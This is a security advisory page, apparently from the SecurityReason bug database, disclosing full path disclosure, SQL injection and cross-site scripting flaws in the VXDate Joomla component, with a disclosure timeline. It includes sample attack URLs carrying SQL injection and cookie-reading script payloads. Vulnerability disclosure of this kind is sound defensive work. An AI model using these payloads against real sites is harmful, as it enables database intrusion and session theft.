|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : MustLive SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : I want to warn you about vulnerabilities in component VXDate for Joomla. ----------------------------- Advisory: Vulnerabilities in VXDate for Joomla ----------------------------- URL: http://websecurity.com.ua/3849/ ----------------------------- Timeline: 10.05.2009 - found the vulnerabilities. 12.01.2010 - announced at my site. 18.01.2010 - informed developers. 13.03.2010 - disclosed at my site. ----------------------------- Details: These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities. Full path disclosure: http://site/index.php?option=com_vxdate&ct=� http://site/index.php?option=com_vxdate&ct=1&md=details&id=& ;#65533; http://site/index.php?option=com_vxdate&ct=1&md=editform&id=&am p;#65533; SQL Injection: http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%2 0or%20version()=5 http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1% 20or%20version()=5 XSS: http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cs cript%3Ealert(document.cookie)%3C/script%3E http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3C script%3Ealert(document.cookie)%3C/script%3E Vulnerable are potentially all versions of VXDate. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |